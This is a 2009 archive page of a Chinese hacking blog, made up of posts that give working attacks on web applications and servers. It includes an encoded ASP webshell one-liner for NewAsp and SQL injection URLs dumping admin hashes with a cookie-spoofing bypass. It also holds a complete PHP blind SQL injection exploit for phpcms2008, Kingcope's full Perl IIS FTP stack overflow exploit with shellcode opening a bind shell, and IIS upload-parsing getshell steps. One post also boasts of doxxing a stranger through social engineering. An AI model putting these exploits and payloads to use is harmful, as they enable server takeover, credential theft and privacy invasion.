RSS

Archive for September, 2009:

fuck 中国被黑站点统计系统

3 Comments | This entry was posted on Sep 28 2009

丫丫的,超级郁闷来着,在流量统计中看到有好几个来路是http://www.zone-h.com.cn
打开发现是中国被黑站点统计系统,没发现和我有关啊。。。搜索我名字st0p后,结果差点让我吐血,这站太不负责了吧,也太搞笑了。。
把我上篇日志”沸腾新闻系统 v0.45 拿 SHELL“中,用远程图片保存BUG时传到我空间中的一句话,发上来了。。。丫,发还发错,应该是过滤了;号。。。
原来地址是http://www.st0p.org/st0p.asp;jpg,现在变成http://www.st0p.org/st0p.aspjpg了。。。。

地址是:http://www.zone-h.com.cn/index.php?key=st0p&mode=domain&Submit=+Search+

china-was-black-fuck-site-statistics-system

,
忆·生活点滴

新云4.0最新0day

83 Comments | This entry was posted on Sep 26 2009

来源:许诺's blog

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

,
学·武功秘籍

终于社工成功

10 Comments | This entry was posted on Sep 25 2009

嘿嘿,想加TR,要回答问题来着。。。
TR大牛发话,回答出9xiao大牛的名字就通过。。。。
通过2个小时的努力,终于社工成功。。。
哇,乱射之下,射中几个无雇群众,还射到了别人一个手机号的信息,手机余额还有60元。。
社工的威力还是很强大的。可怕。。

, ,
忆·生活点滴

沸腾新闻系统 v0.45 拿 SHELL

10 Comments | This entry was posted on Sep 25 2009

作者:st0p
转载请注明出处:http://www.st0p.org

注:已提醒目标站管理员补洞.

看到群里的無材发来一站,打开看了一下,很像是沸腾新闻系统,不过版本写的是V0.1,网上没找到相应的版本,发现有1.1和0.45两个版本,记得在News.asp存在注入来着,试了一下,的确可以,不过因为版本不同,所以news表的字段不同,所有语句有点不同。

经过st0p的尝试,目标站应该是0.45的,通过以下语句成功得到后台用户名和密码HASH,我是试到27个字段时成功的。。

1

http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202

boiling-news-system-v0-45-take-shell1

看到没,我们得到了用户名xcb,密码为c95ca278a74775f8,然后我们去破解MD5,郁闷,查不到,无法破解,难道无法进入后台来着。。。
然后我查看了一下0.45版的代码,发现了验证用户登陆的部分在admin/chkuser.asp中,我们看一下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

< %
IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN
'首先检测cookies中的key,如果不为上面的值,自动转向登陆页面
response.redirect "login.asp"
response.end
END IF
set urs=server.createobject("adodb.recordset")
sql="select * from admin where username='"&Request.cookies("username")&"'"
'查询cookies中username是否是管理用户
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
IF Request.cookies("passwd")<>urs("passwd") THEN
'如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向
response.redirect "login.asp"
response.end
END IF
urs.close
set urs=nothing
%>

嘿嘿,运气还真好,虽然无法破解密码HASH,但可以利用它实现欺骗。看利用过程。。 Read more »

, , , , ,
学·武功秘籍

突破Windows 2003 200k限制的上传程序

2 Comments | This entry was posted on Sep 25 2009

来源:pcsec

在群里看到TR牛发的,记录一下。。

感谢Netpatch的投递

有的时候,我们需要上传大东西,但是由于W2K3默认上传限制为200KB。这个时候,不得不分包,依次上传,那个累呀!
有人问为什么不用Microsoft.XMLHTTP和Adodb.Stream组件,直接从服务器上下载呢【要是不能访问网络呢?你会怎么做?】

于是有了这个超级上传程序。实践可以支持大于10M的文件!

暂时没测试出什么问题!若有问题,请留言!

转载请保留版权。谢谢合作!

SU.vbs ----- 客户端
s.asp ----- 服务端

使用方法:
cscript su.vbs url local_file

cscript su.vbs http://pcsec.org/s.asp c:\test.exe

breakthrough-windows-2003-200k-limit-uploader

, , ,
藏·工具收集

免费提供st0p.org后缀的邮箱

12 Comments | This entry was posted on Sep 24 2009

免费提供username@st0p.org的邮箱,数量有限,可以用来登陆Gtalk.需要的联系我QQ:16739670

, ,
忆·生活点滴

DEDECMS 小说连载模块 0DAY

72 Comments | This entry was posted on Sep 22 2009

作者:st0p
可以转载,不过请注明出处http://www.st0p.org

由于这个洞出现在DEDECMS小说连载的模块中,所以只要DEDECMS安装时选小说连载模块,那么就存在这个问题,有些版本在条件允许下是可以直接拿SHELL的哦。
st0p总结了一下利用条件
条件1:当服务器的PHP设置magic_quotes_gpc = Off
条件2:目标DEDECMS系统安装时选中小说连载模块

首先我们先来看一下DEDECMS 5.1,他的小说频道和DEDECMS 5.3.1,DEDECMS 5.5不同,因为他的文件在member目录下面,文件是member/story_books.php,而DEDECMS 5.3.1和DEDECMS 5.5的文件在book目录下,文件是book/story_books.php
因为里面的代码相似,所以呢,咱们只看一个story_books.php就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

< ?php
......
if(!isset($action)) $action = ''; //检测变量$action是否存在,不存则则给初使值
if(!isset($catid)) $catid = 0; //检测变量$catid是否存在,不存则则给初使值
if(!isset($keyword)) $keyword = ""; //检测变量$keyword是否存在,不存则则给初使值
if(!isset($orderby)) $orderby = 0; //检测变量$orderby是否存在,不存则则给初使值
......
if($catid!=0) $addquery .= " And (b.bcatid='$catid' Or b.catid='$catid') "; 
//变量$catid不为0时,就直接把$catid给$addquery了,没有验证
if($keyword!="") $addquery .= " And (b.bookname like '%$keyword%' Or b.author like '%$keyword%') ";
//变量$keyword不为空时,就直接把$keyword给$addquery了,没有验证
$query = "
   Select b.id,b.catid,b.bookname,b.booktype,b.litpic,b.postnum,b.senddate,b.ischeck, c.id as cid,c.classname From #@__story_books b
   left join #@__story_catalog c on c.id = b.catid where memberid={$cfg_ml->M_ID} and b.id>0 $addquery $orderby
";
//生成了语句
......
?>

上面的代码看到了吧,嘎,catid和keyword没有过滤,所以这就引起了注入,不过好像构成语句有点麻烦,这个就不在本文的讨论了范围了,我们举个小例子试一下,以下操作请在登陆后进行测试,直接注册个帐号,登陆,然后输入以下地址就可以了
Read more »

, , , , , , , , , ,
学·武功秘籍

phpcms2008 最新0day & Exp

1 Comment | This entry was posted on Sep 19 2009

来源:My5t3ry

漏洞存在于yp/job.php的17-34行,urldecode函数惹的祸,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160

<?
 
if ($argc != 4)
usage ();
 
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;
 
 
function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site  : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
"\n[+] Ex.   : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}
 
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);
 
$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
 
fputs ($fp, $request);
 
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
 
fclose ($fp);
return $reply;
}
 
function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;
 
$chr = ord ($chr);
 
$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";
 
$query = str_replace (" ", "%20", $query);
 
$query = str_replace ("'", "%2527", $query);
 
$outcode = request ($hostname, $path, $query);
 
preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
 
if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}
 
$query = "x%2527";
 
$outcode = request ($hostname, $path, $query);
 
preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);
 
$prefix=$match[1];
 
//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";
 
if ($match[1]) { 
 
echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}
 
else {
die(" Exploit failed...");
}
 
echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
 
$query = str_replace (" ", "%20", $query);
 
$query = str_replace ("'", "%2527", $query);
 
$outcode = request ($hostname, $path, $query);
 
$i++;
 
preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}  
 
if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}
 
$length=$i-1;
echo "[+]length -> ".$length;
 
//    return $length;
//}
 
echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
 
while ($pos <= $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
 
if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
 
$pos = 9;
 
echo "\n[+]password(md5) -> ";
 
while ($pos <= 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
 
echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";
 
?>
, , ,
学·武功秘籍

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

16 Comments | This entry was posted on Sep 19 2009 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
 
# http://www.offensive-security.com/0day/msftp.pl.txt
 
use IO::Socket; 
$|=1; 
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
 
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
 
 
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; 
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>\n"; 
exit(0); 
} 
srand(time()); 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/\./,/gi; 
if (fork()) { 
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "\x7E\xF1\xFA\x7F";
# $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k SP4 platforms 
$retaddr = "\x7B\x30\xE4\x77"; # JMP ESP univ on 2 win2k SP4 + Rollup + Fully Patched
 
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" 
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; 
 
# attack buffer 
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; 
$x = <$sock>; 
print $x;                             
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 
 
print $sock "USER anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>;
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD CCC". "$c\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
print $sock "NLST $c*/../C*/\r\n"; 
$x = <$sock>; 
print $x; 
while (1) {} 
} else { 
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!\n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope

代码地址:http://www.offensive-security.com/0day/msftp.pl.txt

利用教程:http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/microsoft-ftp-server-remote-exploit_controller.swf

, , , ,
学·武功秘籍

桃源网盘Getshell洞子

1 Comment | This entry was posted on Sep 19 2009

来源:普瑞斯特

影响版本:最新
作者:银色上帝 静流 上帝之爱
我和银色上帝,静流三个在渗透时候,遇到了这个程序研究了下,发现这个程序可以直接Getshell确切的说还是利用IIS的那个洞子
简单说下利用方法,默认有个账号和密码都是guest的供测试(要看管理是否禁止了)
登陆之后,上传一个利用IIS的解析漏洞的马
可惜我们不知道路径,我们用其他方法搞到一台服务器,对照发现
他的路径就是:www.test.com/XX/ID/1.asp;1.jpg
xx=见下面说明
ID=你的账号
可惜这个XX这个我们发现好多都不一样怎么办呢?
后来发现直接提交以下语句可以爆出XX的目录名

http://test/show.aspx?type=1&filepath=http://test/

另外说下:
1.有时候默认的guest是禁用的,需要你注册等管理审核
2.上传之后的文件不要改名,比如你上传了1.jpg,上传之后你想改成1.asp;1.jpg.那是不行的,因为上传之后的文件修改的话,他会吃掉一个";"符号

, , ,
学·武功秘籍
Page 1 of 212